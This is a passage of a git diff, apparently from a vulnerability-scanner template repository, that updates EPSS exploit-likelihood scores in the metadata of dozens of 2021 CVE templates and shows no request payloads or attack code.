cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index b6270f614e..fc54b77384 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-22,CWE-200 - epss-score: 0.11624 - epss-percentile: 0.94664 + epss-score: 0.06768 + epss-percentile: 0.9311 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 48e3ae059f..a8966c440a 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41291 cwe-id: CWE-22 epss-score: 0.0476 - epss-percentile: 0.9177 + epss-percentile: 0.9178 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 1cd3795756..c7e2dc27b2 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41293 cwe-id: CWE-22 epss-score: 0.0476 - epss-percentile: 0.9177 + epss-percentile: 0.9178 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 7232d9b4a6..773e936ca8 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.5 cve-id: CVE-2021-41349 epss-score: 0.83718 - epss-percentile: 0.98107 + epss-percentile: 0.98109 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index ea533c8498..2d0401c360 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41381 cwe-id: CWE-22 epss-score: 0.08201 - epss-percentile: 0.93641 + epss-percentile: 0.93647 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 306aa33637..d0ae50256c 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35044 + epss-percentile: 0.35055 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 51af31983b..045546cfd9 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.01115 - epss-percentile: 0.8296 + epss-percentile: 0.82971 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 1e8a19694f..7cd9ec802a 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41467 cwe-id: CWE-79 epss-score: 0.00133 - epss-percentile: 0.48209 + epss-percentile: 0.48221 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index 190754608c..938c0829da 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41569 cwe-id: CWE-829 epss-score: 0.00978 - epss-percentile: 0.81747 + epss-percentile: 0.81757 cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 884e74d55b..efbe8a9a78 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41648 cwe-id: CWE-89 epss-score: 0.06237 - epss-percentile: 0.92784 + epss-percentile: 0.92789 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index a78a1cd210..463473aa82 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41649 cwe-id: CWE-89 epss-score: 0.04045 - epss-percentile: 0.91087 + epss-percentile: 0.91093 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 12d55198da..2d49a1d0ac 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-41749 cwe-id: CWE-94 epss-score: 0.2727 - epss-percentile: 0.96249 + epss-percentile: 0.96252 cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index fd903b57c4..d0f487e792 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-41773 cwe-id: CWE-22 epss-score: 0.97474 - epss-percentile: 0.9996 + epss-percentile: 0.99959 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index 9d0f6ad898..66f9379ae0 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41826 cwe-id: CWE-601 epss-score: 0.93913 - epss-percentile: 0.98881 + epss-percentile: 0.98882 cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 95937f233b..852efb2b21 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41878 cwe-id: CWE-79 epss-score: 0.00675 - epss-percentile: 0.77596 + epss-percentile: 0.77614 cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index b1fbed91d1..b714e71081 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-41951 cwe-id: CWE-79 epss-score: 0.7632 - epss-percentile: 0.97841 + epss-percentile: 0.97843 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index f60ab71402..bd23fe0efd 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -19,7 +19,7 @@ info: cve-id: "CVE-2021-42013" cwe-id: CWE-22 epss-score: 0.97391 - epss-percentile: 0.99891 + epss-percentile: 0.99892 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 72ddff8cad..b5e6042324 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-42063 cwe-id: CWE-79 epss-score: 0.00491 - epss-percentile: 0.73466 + epss-percentile: 0.73493 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 9b144cda3a..e60b772dc0 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42192 cwe-id: CWE-863 epss-score: 0.0106 - epss-percentile: 0.82515 + epss-percentile: 0.82527 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 0c4a307652..9fd4255f60 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 - epss-score: 0.97458 - epss-percentile: 0.99947 + epss-score: 0.97467 + epss-percentile: 0.99954 cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 45ebf72110..0db6a135c8 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.46567 + epss-percentile: 0.46579 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index a1b86fa177..cf79e0725e 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-42565 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index e29686cf97..63b78bf3a6 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-42566 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 5cd494ddb8..d9b95de57d 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - epss-percentile: 0.96177 + epss-percentile: 0.9618 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index dcbf2ce8e8..17d6284f9d 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42627 epss-score: 0.05731 - epss-percentile: 0.92503 + epss-percentile: 0.92509 cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index bfdd882425..e28ac393f6 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45123 + epss-percentile: 0.45139 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index 7d276e56bd..c5da45954c 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42667 cwe-id: CWE-89 - epss-score: 0.03506 - epss-percentile: 0.90472 + epss-score: 0.03748 + epss-percentile: 0.9078 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index 80702f6336..39a3d93f49 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-42887 cwe-id: CWE-287 epss-score: 0.02247 - epss-percentile: 0.88353 + epss-percentile: 0.88359 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 75949b7f8e..1c657b7ebc 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43062 cwe-id: CWE-79 epss-score: 0.00617 - epss-percentile: 0.7646 + epss-percentile: 0.76482 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 0ab881db80..ef85fda1f1 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43287 cwe-id: CWE-200 epss-score: 0.58851 - epss-percentile: 0.97374 + epss-percentile: 0.97375 cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index 336493a228..d1ed74d9b2 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43421 cwe-id: CWE-434 epss-score: 0.05774 - epss-percentile: 0.92524 + epss-percentile: 0.9253 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 9f725fa319..98ff422665 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-43495 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91869 + epss-percentile: 0.9188 cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 9c3dd8f0b6..c414079604 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-43496 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91869 + epss-percentile: 0.9188 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 89dc853c99..4844cf11d0 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43510 cwe-id: CWE-89 epss-score: 0.0553 - epss-percentile: 0.92393 + epss-percentile: 0.924 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index f0bae5a8d7..00507e3bc6 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50128 + epss-percentile: 0.50151 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index d81a9aae85..b050376d07 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43725 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.47632 + epss-percentile: 0.47642 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 9098cbddc5..128fa35989 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-43734 cwe-id: CWE-22 epss-score: 0.03024 - epss-percentile: 0.89844 + epss-percentile: 0.89848 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index 4edd02733f..29fcac7820 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43778 cwe-id: CWE-22 epss-score: 0.75886 - epss-percentile: 0.97826 + epss-percentile: 0.97829 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index c4aeea5327..cd0c9a6898 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 - epss-percentile: 0.74019 + epss-percentile: 0.74045 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 6b9a8770f6..78693ad73e 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-44138 cwe-id: CWE-22 epss-score: 0.02869 - epss-percentile: 0.8961 + epss-percentile: 0.89616 cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 0139ec7e60..cfc22f2a46 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01329 - epss-percentile: 0.84558 + epss-percentile: 0.84565 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index a0092d8788..9567bb0bd4 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-44152 cwe-id: CWE-306 epss-score: 0.76593 - epss-percentile: 0.97847 + epss-percentile: 0.97849 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 74357a0d20..a176de760e 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -87,4 +87,5 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request -# digest: 490a0046304402205f07eef11c12c274593ea5b2645465586abba56c7317a79f5ca422f25280cde3022014e4efde0c703b222d78a91ab21f215aa2ce79c330981acdcf451a9346328f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205f07eef11c12c274593ea5b2645465586abba56c7317a79f5ca422f25280cde3022014e4efde0c703b222d78a91ab21f215aa2ce79c330981acdcf451a9346328f88:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 9042523291..b42bbafef0 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-44427 cwe-id: CWE-89 epss-score: 0.04953 - epss-percentile: 0.91914 + epss-percentile: 0.91925 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index de08247832..3f9bbab942 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-44451 cwe-id: CWE-522 epss-score: 0.00857 - epss-percentile: 0.80421 + epss-percentile: 0.80437 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index b7de55b425..f305a4764d 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44528 cwe-id: CWE-601 epss-score: 0.00087 - epss-percentile: 0.36259 + epss-percentile: 0.36273 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index ad4005226d..beded005ed 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44529 cwe-id: CWE-94 epss-score: 0.95982 - epss-percentile: 0.99288 + epss-percentile: 0.99289 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index f4195b7610..1b6e09112c 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.01249 - epss-percentile: 0.84022 + epss-percentile: 0.84031 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index fb5f22f4b0..d371a25eb6 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - epss-percentile: 0.92293 + epss-percentile: 0.923 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index a10f1f582d..9e1b555522 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-45046 cwe-id: CWE-917 epss-score: 0.9741 - epss-percentile: 0.99904 + epss-percentile: 0.99905 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index c84cb53380..50b33777e1 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.05789 - epss-percentile: 0.92534 + epss-percentile: 0.9254 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index f7756ff4b8..3de5d413cb 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.0157 - epss-percentile: 0.85837 + epss-percentile: 0.85842 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 9e0964333c..1c03ec21da 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-45422 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.5963 + epss-percentile: 0.59664 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 8a91a486c1..6486d561a8 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45428 cwe-id: CWE-639 epss-score: 0.08441 - epss-percentile: 0.93715 + epss-percentile: 0.9372 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 987b92d6a8..36331cfaa2 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45967 cwe-id: CWE-22 epss-score: 0.71224 - epss-percentile: 0.97699 + epss-percentile: 0.977 cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 37c3240c11..22102bca27 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-45968 cwe-id: CWE-918 epss-score: 0.01828 - epss-percentile: 0.86896 + epss-percentile: 0.869 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 8809421a17..16edda3071 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.4996 + 